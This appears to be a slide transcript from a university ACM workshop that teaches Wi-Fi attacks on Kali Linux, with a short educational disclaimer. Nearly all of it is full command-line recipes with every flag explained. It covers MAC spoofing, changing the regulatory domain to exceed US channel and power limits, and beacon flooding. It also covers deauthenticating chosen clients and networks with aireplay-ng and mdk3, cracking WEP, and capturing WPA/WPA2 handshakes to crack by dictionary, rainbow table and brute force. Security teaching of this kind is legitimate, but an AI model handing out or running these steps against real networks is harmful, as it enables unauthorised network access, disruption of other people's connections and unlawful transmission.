ACM Wi-Fi Workshop Presented By: Chris Rawlings Brad Emge.

ACM Wi-Fi Workshop Presented By: Chris Rawlings Brad Emge

Disclaimer By participating in this workshop you agree to be hacked for demonstration purposes only. Don't worry, no personal data will be collected or stored. Tools demonstrated in this panel are legitimate devices that comply with all the necessary rules and regulations and are used by Governments and Penetration testers to conduct lawful spying and security audits. The contents of this file are for educational purposes only. It is strongly suggested that you do not use this knowledge for illegal purposes.

Information All steps in this slide show were performed and tested on 32-bit kali linux version 1.0.6 with an Alfa AWUSO36H USB wireless card(these are the operating system and wireless card you have in front of you). Any statement that beings with ‘#’ is a command to be typed in the terminal

What is Kali Linux Debian based Linux operating system Designed for the sole purpose of penetration testing, exploitation, and hacking

Booting into Kali Linux Start with computer off Plug in flash drive and USB wireless card Boot the computer off of the USB flash drive From YUMI select system tools then kali Select live (686-pae) from the boot menu

Post Kali Boot Make sure that your computer is not in “airplane” mode –Click applications  system tools  preferences  system settings  network –Make sure airplane mode is off –Close that window

Temporarily Connecting to The Internet Click the network icon in the upper right –Looks like two computers with a red circle and a X Select the MST-PSK-N network Make sure you are connecting with the non-realtek wireless adapter Enter the password “JoeMiner”

Getting Necessary Files Open the terminal Type #wget http://tinyurl.com/acmwifiworkshopfil es http://tinyurl.com/acmwifiworkshopfil es Open root under the places menu Unzip the file and make sure the files are all in the root folder

Terms and Definitions Access Point(AP) Bandwidth Channel Evil Twin Frequency Honeypot IEEE 802.11

Terms and Definitions IP Address ISM Band MAC Address Modes of Wi-fi NIC Packet

Terms and Definitions Rainbow Table WEP Wi-Fi WPA WPA2 WPS

FINDING THE CORRECT WIRELESS CARD

Open the terminal

Type #airmon-ng

FINDING YOUR MAC ADDRESS

Type #ifconfig wlan1 ifconfig –program we are using wlan1 –interface we want information on

#ifconfig wlan1

CHANGING YOUR MAC ADDRESS

Type #ifconfig wlan1 down ifconfig –program that we are running wlan1 –interface we are operating on down –disable the interface

#ifconfig wlan1 down

Type #macchanger –m de:ad:be:ef:c0:fe wlan1 macchanger –program we are using -m –manually set the MAC address de:ed:be:ef:c0:fe –MAC address of your choice wlan1 –interface we are changing the MAC of

#macchanger –m de:ad:be:ef:c0:fe wlan1

Type #ifconfig wlan1 up ifconfig –program that we are running wlan1 –interface we are operating on down –enable the interface

#ifconfig wlan1 up

Type #ifconfig wlan1 ifconfig –program we are using wlan1 –interface we are interested in

#ifconfig wlan1

RANDOMLY CHANGING YOUR MAC ADDRESS

Type #macchanger –r wlan1 macchanger –program we are using -r –random MAC address wlan1 –interface we are operating on

#macchanger –r wlan1

Type #ifconfig wlan1 up ifconfig –program we are using wlan1 –interface we are interested in up –enable the interface

#ifconfig wlan1 up

Type #ifconfig wlan1 ifconfig –the program we are using wlan1 –the interface we are interested in

#ifconfig wlan1

CHANGING YOUR MAC ADDRESS BACK TO IT’S FACTORY SETTING

Type #macchanger –p wlan1 macchanger –the program we are using -p –changes the MAC back to factory settings wlan1 –the interface we are operating on

#macchanger –p wlan1

Type #ifconfig wlan1 up ifconfig –program we are using wlan1 –interface we are interested in up –enable the interface

#ifconfig wlan1 up

Type #ifconfig wlan1 ifconfig –the program we are using wlan1 –the interface we are interested in

#ifconfig wlan1

CHANGING THE CHANNEL OF YOUR WIRELESS CARD

type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are interested in

#iwconfig wlan1

type #iwconfig wlan1 channel c iwconfig –program we are using wlan1 –interface we are operating on channel –allows you to change the channel c –specific channel you wish to use 1,2,3…

#iwconfig wlan1 channel c

type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are interested in

#iwconfig wlan1

OPERATING OUTSIDE OF US REGULATION FREQUENCIES

type #iw reg get iw –program we are using reg –short for regulation get –show the iw regulation settings

#iw reg get

type #iw reg set JP iw –program we are using reg –short for regulation set –allows us to set the country regulation JP –country code for japan allows us to operate on channels 12,13,&14

#iw reg set JP

type #iw reg get iw –program we are using reg –short for regulation get –show the iw regulation settings

#iw reg get

Type #iwconfig wlan1 channel 14 iwconfig –program we are using wlan1 –interface we are operating on channel –allows us to set the channel 14 –channel we are setting

#iwconfig wlan1 channel 14

Type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are interested in

#iwconfig wlan1

CHANGING THE CHANNEL BACK TO A LEGAL FREQUENCY

type #iwconfig wlan1 channel c iwconfig –program we are using wlan1 –interface we are operating on channel –allows you to change the channel c –specific channel you wish to use 1,2,3…

#iwconfig wlan1 channel c

OPERATING YOUR WIRELESS CARD WITH MORE POWER

Type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are operating on

#iwconfig wlan1

Type #iw reg set BO iw –program we are using reg –short for regulation set –allows us to set the country regulation BO –country code for Bolivia

#iw reg set BO

Type #iwconfig wlan1 txpower 30 iwconfig –program we are using wlan1 –interface we are operating on txpower –stands for transmit power 30 –power output in dBm

#iwconfig wlan1 txpower 30

Type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are operating on

#iwconfig wlan1

Note on Transmit Power The power output has increased from.1 Watt to 1 Watt With our current equipment(Wi-Fi card and antenna) we will not be violating FCC regulation, however with a higher gain antenna we could be

FINDING THE MODES YOUR WIRELESS CARDS SUPPORTS

Type #airmon-ng airmon-ng –program we are using

#airmon-ng

Type #iw phy phy0 info|grep –A3 modes iw –program we are using phy –search based upon physical device number phy0 –physical device number from airmon-ng info –give us the info about the phy0 device | grep –pipes the output into the program grep -A3 –indicates to output 3 lines are the given search term modes –the term we are searching for with grep

#iw phy phy0 info|grep –A3 modes

Modes Supported IBSS –ad-hoc mode –computer to computer connection managed –allows you to connect to networks –your Wi-Fi card is usually in managed mode monitor –promiscuous mode –allows you to view traffic not destined to your card

OPERATING YOUR CARD IN AD-HOC MODE

Type #iwconfig wlan1 mode ad-hoc iwconfig –program we are using wlan1 –interface we are operating on mode –allows us to set a specific mode ad-hoc –the mode we will be using

#iwconfig wlan1 mode ad-hoc

Type #iwconfig wlan1 channel 1 iwconfig –program we are using wlan1 –interface we are operating on channel –allows us to change the channel 1 –specific channel we are using 1,2,3…

#iwconfig wlan1 channel 1

Type #iwconfig wlan1 essid ‘nameofnetwork’ iwconfig –program we are using wlan1 –interface we are operating on essid –allows us to set the network name ‘nameofnetwork’ –name of the network

iwconfig wlan1 essid ‘nameofnetwork’

Type #iwconfig wlan1 key s:’password’ iwconfig –program we are using wlan1 –interface we are operating on key –allows us to operate a network with a WEP key –a WPA/WPA2 key is not possible(I think) s: –indicates the key entered is in ASCII ‘password’ –the key as an ASCII String

#iwconfig wlan1 key s:’password’

Type #ifconfig wlan1 up ifconfig –program we are using wlan1 –interface we are operating on up –enable the interface

#ifconfig wlan1 up

Type #iwconfig wlan1 iwconfig –the program we are using wlan1 –the interface we are operating on

#iwconfig wlan1

TURNING OFF AD-HOC MODE

type #iwconfig wlan1 mode managed iwconfig –program we are using wlan1 –interface we are operating on mode –allows us to change the mode of the adapter managed –sets managed mode

OPERATING YOUR CARD IN MONITOR MODE

type #airmon-ng start wlan1 airmong-ng –program we are using start –enables monitor mode wlan1 –interface we wish to enable monitor mode on

#airmon-ng start wlan1

type #kill 3018 & kill 3853 kill –command to stop programs from running 3018 –PID of process from slide before & –and, allows multiple commands in one line

#kill 3018 & kill 3853

type #iwconfig iwconfig –program we are using

#iwconfig

DATA GATHERING IN MONITOR MODE

type #tshark –i mon0 tshark –program we are using –terminal wireshark -i –interface mon0 –interface we are operating on

#tshark –i mon0

type ctrl-c crtl-c –stops the running program

type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we wish to view wireless traffic on

#airodump-ng mon0

BSSID –MAC address of access point station –MAC address of connected client Probe –shows what access points a station is looking for

type ctrl-c crtl-c –stops the running program

BEACON FLOODING

What are Beacons Management Frame in IEEE 802.11(Wi-Fi) Transmitted to announce the presence of a network Includes information such as the name, the channel, supported data speeds, whether or not it is encrypted, etc.

type #nano ssidlist nano –text editor I am using –you may use something else if you prefer ssidlist –filename for the text file that will contain the SSIDS we will be broadcasting

#nano ssidlist

type different network names on separate lines

type ctrl-x, y, enter This saves the file in nano you could also write out the file and then exit this may be different if you didn’t use nano

type #mdk3 mon0 b –f ssidlist mdk3 –program we are using mon0 –interface we are operating on b –means to send out beacon frames ssidlist –text files with the network names in it

#mdk3 mon0 b –f ssidlist

type ctrl-c to stop stops the running program

VIEWING PROBE REQUESTS

What are Probe Requests Management Frame in IEEE 802.11(Wi-Fi) A packet sent from a client(computer, phone, etc) to see if a network is within range Your devices are constantly sending out Probe Requests and we can view them(also exploit them, but that’s later)

type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are operating on

#airodump-ng mon0 In a very dense Wi-Fi environment, we will be unable to see the probe requests at first to fix this –zoom out available from the view menu –stop the program with ctrl-c –zoom in available from the view menu

#airodump-ng mon0

PASSIVE NETWORK SCAN

Type #iw dev wlan1 scan passive | grep SSID iw –program we are using dev –indicates that we are identifying our Wi-Fi card by device number and not physical number wlan1 –interface we wish to scan on passive –indicates that no packets should be sent | grep –program that is used to search the output SSID –the word that grep will be searching for

#iw dev wlan1 scan passive | grep SSID

ACTIVE NETWORK SCAN

Type #iwlist wlan1 scan | grep ESSID iwlist –program we are using wlan1 –interface we are scanning on scan –indicates we wish to scan |grep –program used to search the output of iwlist ESSID –the word we are searching for with grep

#iwlist wlan1 scan | grep ESSID

DEAUTHENTICATION

What is Deauthentication Management Frame in IEEE 802.11(Wi-Fi) Allows clients to be kicked off of a wireless access point These are naturally occurring in wireless traffic and users do not even recognize it We can send excessive amounts of these packets to prevent a client from connecting

DEAUTHENTICATION DIRECTED AT A PARTICULAR CLIENT

Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are operating on

#airodump-ng mon0

type ctrl-c when you have finished finding your target

Type #iwconfig mon0 channel 11 iwconfig –program we are using mon0 –interface we are changing the channel of channel –indicates we are changing the channel 11 –channel we are changing to

#iwconfig mon0 channel 11

Type #aireplay-ng --ignore-negative- one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:b2 mon0 aireplay-ng –program we are using --ignore-negative-one –needed because of a potential driver issue –you may be able to get it to work without this -0 –indicates deauthentication packet 10 –number of deauths to send -a 00:1a:c4:51:3c:31 –access point MAC address -c d4:20:6d:41:78:b2 –client MAC address mon0 –interface to send deauth packets out on

#aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:b2 mon0

DEAUTHENTICATION DIRECTED TOWARD A SPECIFIC NETWORK

Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are using

#airodump-ng mon0

type ctrl-c when you have finished finding your target

Type #iwconfig mon0 channel 11 iwconfig –program we are using mon0 –interface we are changing the channel of channel –indicates we are changing the channel 11 –channel we are changing to

Type #nano blacklist nano –text editor we are using –you may use something else if you prefer blacklist –name of the text file we are editing

#nano blacklist

Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point Type ctrl-x, y, enter –this saves the file

Type #mdk3 mon0 d –b blacklist –c 11 mdk3 –program we are using mon0 –interface we are deauthenticating from d –indicates deauthentication packets are to be sent -b –indicates that we are using a blacklist. We are wanting to attack the indicated access points blacklist –file that has the list of MAC addresses to deauth -c –indicates what channel to use 11 –channel the access points are operating on

#mdk3 mon0 d –b blacklist –c 11

type ctrl-c to stop the program

DEAUTHENTICATION DIRECTED TOWARD MULTIPLE NETWORKS

Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are using

#airodump-ng mon0

Type #nano blacklist nano –text editor we are using –you may use something else if you prefer blacklist –name of the text file we are editing

#nano blacklist

Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point Type ctrl-x, y, enter –this saves the file

Type #mdk3 mon0 d –b blacklist –c 6,11 mdk3 –program we are using mon0 –interface we are deauthenticating from d –indicates deauthentication packets are to be sent -b –indicates that we are using a blacklist. We are wanting to attack the indicated access points blacklist –file that has the list of MAC addresses to deauth -c –indicates what channel to use 6,11 –channels the access points are operating on

#mdk3 mon0 d –b blacklist –c 6,11

type ctrl-c to stop the program

CLIENTS FORCED TO CONNECT TO A SPECIFIC ACCESS POINT

#airodump-ng mon0

type ctrl-c when done finding the access point to wish for clients to connect to

Type #nano whitelist nano –text editor we are using –you may use something else if you prefer whitelist –text file with the list of MAC addresses of the access points you want clients to be able to connect to

#nano whitelist

note that it is possible to enter multiple MAC addresses in this file as well type ctrl-x, y, enter with finished

Type #mdk3 mon0 d –w whitelist mdk3 –program we are using mon0 –interface to send deauth packets from d –indicates to deauthenticate clients -w –indicates we are whitelisting specific access points whitelist –text file that contains the MAC address of the AP we want clients to connect to –deauths all APs other than those on this list

#mdk3 mon0 d –w whitelist

type ctrl-c when done sending deauth packets

BREAKING ENCRYPTION

BREAKING WEP ENCRYPTION

Breaking WEP Encryption

Steps –Identify Network –Begin collecting data –cause extra data to be generated optional will not want to be done if conducting a passive attack –start cracking once the number of Initialization Vectors(IVs) reaches 50,000

#airodump-ng mon0

Notice that in the ENC column it says WEP. Any WEP encrypted access point is vulnerable. type ctrl-c when you have finished finding your target

#airodump-ng mon0

Breaking WEP Encryption open a new table in the terminal window file  new tab

Type #aireplay-ng --ignore-negative- one -1 0 –a 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0 aireplay-ng –program we are using --ignore-negative-one –needed because of a potential driver issue –this may not be needed –Associates with the Access Point -a 12:18:0a:21:ae:e4 –indicates MAC address of AP & MAC of the AP -h 00:c0:ca:75:6f:ab –sets source MAC address & MAC of our wireless card mon0 –interface we are operating on

Type #aireplay-ng --ignore-negative- one -1 0 –a 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0

Type #aireplay-ng --ignore-negative- one -3 –b 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0 aireplay-ng –program we are using --ignore-negative-one –needed because of a potential driver issue –this may not be needed -3 –ARP Request Replay Attack –most effective way to generate new IVs -b 12:18:0a:21:ae:e4 –indicates MAC address of AP & MAC of the AP -h 00:c0:ca:75:6f:ab –sets source MAC address & MAC of our wireless card mon0 –interface we are operating on

#aireplay-ng --ignore-negative-one -3 –b 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0

Breaking WEP Encryption Go back to the first tab and wait until the number in the data column >50000 This number is not set since the attack we are doing is based upon statistics. Sometimes you can break it with half as many and sometimes you need twice as many or more. The length of the key also contributes to the number of IVs that are needed

Breaking WEP Encryption

Open a new tab in the terminal

Type #aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep- 01.cap aircrack-ng –program we are using -b 12:18:0a:21:ae:e4 –the MAC address of the target Access Point acm_wep-01.cap –the file that contains the files captures with airodump-ng

#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep- 01.cap

If you are not successful wait until the number captured increases to the suggested number and then try again

#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep- 01.cap

If successful, you will see the image previous. Go back to the other two tabs and stop the running programs using ctrl-c

BREAKING WPA&WPA2 ENCRYPTION

Breaking WPA&WPA2 Encryption What makes WPA&WPA2 more difficult to break into? –larger key –does not use RC4 –Used Network as well as password to computer the key

Breaking WPA&WPA2 Encryption No short cut like in breaking WEP Must brute force the key Hope that it is a dictionary word or something very simple such as ten numbers Three networks set up for breaking into –dictionary password –8-char alpha-numeric –random

Breaking WPA&WPA2 Encryption Process –Begin listen to the packets on that network –Capture 4-way handshake between AP and client this can be done passively or by deauthentication –take that captured handshake and try different sources of passwords to break it –wait and see

BREAKING WPA WITH A DICTIONARY LIST

Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are using to listen on

#airodump-ng mon0

After finding the target network type ctrl-c to stop running the program

Type #airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0 airodump-ng –program we are using -c 11 –says to listen on channel 11 --bssid 00:1a:c4:51:3c:31 –listen for traffic to and from this Access point --w acm_dictionary –file to save the data to mon0 –interface we are listening on

#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0

The previous image shows connected clients to the specific access point At this point you could wait for the handshake to occur or you could force it to occur by means of deauth

Breaking WPA&WPA2 encryption Open a new tab in terminal This can be done by going to file  new tab

Type #iwconfig mon0 channel 11 iwconfig –program we are using mon0 –interface we are operating on channel –allows us to change the channel 11 –specific channel we are changing the interface to

Type #aireplay-ng --ignore-negative- one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0 aireplay-ng –program we are using --ignore-negative-one –needed because of a potential driver issue –you may be able to get it to work without this -0 –indicates deauthentication packet 10 –number of deauths to send -a 00:1a:c4:51:3c:31 –access point MAC address -c d4:20:6d:41:78:b2 –client MAC address mon0 –interface to send deauth packets out on

#aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0

Type #aireplay-ng --ignore-negative- one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0

Breaking WPA&WPA2 encryption Go back to the first tab and you should see an image similar to the following The WPA handshake in the top must be there to proceed

#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0

Breaking WPA&WPA2 encryption Make sure the dictionary files that you downloaded earlier are in the same folder as your.cap files. This should be in the root directory We will be demonstrating using the english.txt file, however feel free to experiment with the others

Type #aircrack-ng acm_dictionary-01.cap –w english.txt aircrack-ng –program we are using to crack the key acm_dictionary-01.cap –network capture file with the handshake in it -w –indicates that a word list is to be used english.txt –the file name containing the wordlist

#aircrack-ng acm_dictionary- 01.cap –w english.txt

If not successful that means that the password was not in that list of words You could try using a larger word list or begin brute forcing to break the password If successful you should see the following

#aircrack-ng acm_dictionary- 01.cap –w english.txt

BREAKING WPA&WPA2 USING A RAINBOW TABLE

What is a Rainbow Table pre-computed table of hashed value they are built for a specific SSID(network name) built using a dictionary or some other source of passwords Takes a long time to compute and is a very large file –Usually done on a very powerful computer The rainbow can then be used to quickly find a password

Breaking WPA&WPA2 using a Rainbow Table Because we already have the handshake, we do not need to re- capture it. We will be using the same.cap file as the previous example

Breaking WPA&WPA2 encryption Make sure the rainbow table that you downloaded earlier is in the same folder as your.cap files. This should be in the root directory We will be demonstrating using the acm_dictionary_hash file This file was created from the english.txt dictionary file specifically for this SSID

Type #cowpatty –r acm_dictionary-01.cap –d acm_dictionary_hash –s acm_dictionary cowpatty –program we are using -r acm_dictionary-01.cap –the file that has the four way handshake in it -d acm_dictionary_hash –the file that is the pre-computed hashed for this specific SSID -s acm_dictionary –telling cowpatty what the name of the network is

#cowpatty –r acm_dictionary- 01.cap –d acm_dictionary_hash – s acm_dictionary

If the password was not in the source file used to generate the rainbow table then this technique will fail and you’ll either have to try the dictionary attack, make a new rainbow table, or brute force the password If successful, you will see the following image

#cowpatty –r acm_dictionary- 01.cap –d acm_dictionary_hash – s acm_dictionary

COMPUTING A PERSONALIZED RAINBOW TABLE

Computing a personalized rainbow table As this is very time consuming, it is usually only done for very common SSID names such as netgear, linksys, etc This is also used when you know the network name in advance and wish to prepare for the attack on the network

Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are using to listen on

#airodump-ng mon0

After finding the target network type ctrl-c to stop running the program

Type #genpmk –f english.txt –d acm_dictionary_hash –s acm_dictionary genpmk –the program we are using -f english.txt –the file serving as the source of passwords -d acm_dictionary_hash –what the rainbow table should be saved as -s acm_dictionary –telling genpmk what the SSID is so that it can be hashed appropriately

#genpmk –f english.txt –d acm_dictionary_hash –s acm_dictionary

BRUTE FORCING A PASSWORD

Brute forcing a password This is the most time consuming method although is guaranteed to eventually find the password

Brute forcing a password As you already have the four way hand shake, we will be moving right into the cracking portion of this example

Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w – acm_dictioanry-01.cap john –program we using. short for john the ripper -stdout –directs standard out to aircrack-ng -incremental:all –will increment through all possible passwords | aircrack-ng –second program we are running with the input being supplied by john the ripper -b 00:1a:c4:51:3c:31 –tells aircrack-ng which access point to attack -w – –this is where the standard output of john the ripper is going acm_dictionary-01.cap –the file containing the four way handshake to be brute forced

Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w – acm_dictioanry-01.cap

Brute forcing a password The previous slide shows John the Ripper and aircrack-ng being used together There are ways to cut down on the number of possible passwords, for example –if you know the password is 14 characters, you can have john skip passwords less than and greater than 14 characters. This is the longest way to crack a password but also a guaranteed way to do it

ACM Wi-Fi Workshop Presented By: Chris Rawlings Brad Emge.

Similar presentations

Presentation on theme: "ACM Wi-Fi Workshop Presented By: Chris Rawlings Brad Emge."— Presentation transcript:

Similar presentations

About project

Feedback

Log in

Auth with social network:

ACM Wi-Fi Workshop Presented By: Chris Rawlings Brad Emge.

Similar presentations

Presentation on theme: "ACM Wi-Fi Workshop Presented By: Chris Rawlings Brad Emge."— Presentation transcript:

Similar presentations

About project

Feedback